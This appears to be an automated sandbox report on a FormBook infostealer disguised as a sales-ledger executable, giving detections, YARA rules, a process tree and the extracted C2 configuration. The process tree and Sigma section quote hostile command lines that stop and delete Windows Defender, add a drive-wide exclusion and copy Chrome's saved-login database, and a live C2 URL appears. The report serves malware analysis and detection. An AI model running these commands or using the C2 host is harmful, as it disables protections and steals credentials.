Play interactive tour

Edit tour

Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Sample Name:	Require your Sales Ledger from 01-April-2020.exe
Analysis ID:	385451
MD5:	c7c27e1859f1593aedb1eebf0a15175e
SHA1:	deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256:	d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected FormBook malware

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Yara detected Costura Assembly Loader

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Require your Sales Ledger from 01-April-2020.exe (PID: 5792 cmdline: 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe' MD5: C7C27E1859F1593AEDB1EEBF0A15175E)

AdvancedRun.exe (PID: 2644 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 6200 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AdvancedRun.exe (PID: 6332 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 2420 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Require your Sales Ledger from 01-April-2020.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe MD5: C7C27E1859F1593AEDB1EEBF0A15175E)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 2644 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Require your Sales Ledger from 01-April-2020.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa218:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa492:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x36c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x36eb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15fc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x429e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ab1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x424d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x160c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x42ae7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1623f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x42c5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaeaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x378ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14d2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x4174c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbba3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x385c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1be37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x48857:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ce4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18d59:$sqlite3step: 68 34 1C 7B E1 0x18e6c:$sqlite3step: 68 34 1C 7B E1 0x45779:$sqlite3step: 68 34 1C 7B E1 0x4588c:$sqlite3step: 68 34 1C 7B E1 0x18d88:$sqlite3text: 68 38 2A 90 C5 0x18ead:$sqlite3text: 68 38 2A 90 C5 0x457a8:$sqlite3text: 68 38 2A 90 C5 0x458cd:$sqlite3text: 68 38 2A 90 C5 0x18d9b:$sqlite3blob: 68 53 D8 7F 8C 0x18ec3:$sqlite3blob: 68 53 D8 7F 8C 0x457bb:$sqlite3blob: 68 53 D8 7F 8C 0x458e3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2be58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2c0d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x53e78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x540f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5fc25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x376f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5f711:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x37d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5fd27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x37e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5fe9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2caea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x54b0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3696c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5e98c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2d7e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x55803:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3da77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x65a97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x3ea8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3a999:$sqlite3step: 68 34 1C 7B E1 0x3aaac:$sqlite3step: 68 34 1C 7B E1 0x629b9:$sqlite3step: 68 34 1C 7B E1 0x62acc:$sqlite3step: 68 34 1C 7B E1 0x3a9c8:$sqlite3text: 68 38 2A 90 C5 0x3aaed:$sqlite3text: 68 38 2A 90 C5 0x629e8:$sqlite3text: 68 38 2A 90 C5 0x62b0d:$sqlite3text: 68 38 2A 90 C5 0x3a9db:$sqlite3blob: 68 53 D8 7F 8C 0x3ab03:$sqlite3blob: 68 53 D8 7F 8C 0x629fb:$sqlite3blob: 68 53 D8 7F 8C 0x62b23:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17629:$sqlite3step: 68 34 1C 7B E1 0x1773c:$sqlite3step: 68 34 1C 7B E1 0x17658:$sqlite3text: 68 38 2A 90 C5 0x1777d:$sqlite3text: 68 38 2A 90 C5 0x1766b:$sqlite3blob: 68 53 D8 7F 8C 0x17793:$sqlite3blob: 68 53 D8 7F 8C
24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data

Show sources

Source: Process started

Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 6856, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2644

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: Require your Sales Ledger from 01-April-2020.exe

ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Require your Sales Ledger from 01-April-2020.exe

Joe Sandbox ML: detected

Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Require your Sales Ledger from 01-April-2020.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: Require your Sales Ledger from 01-April-2020.exe

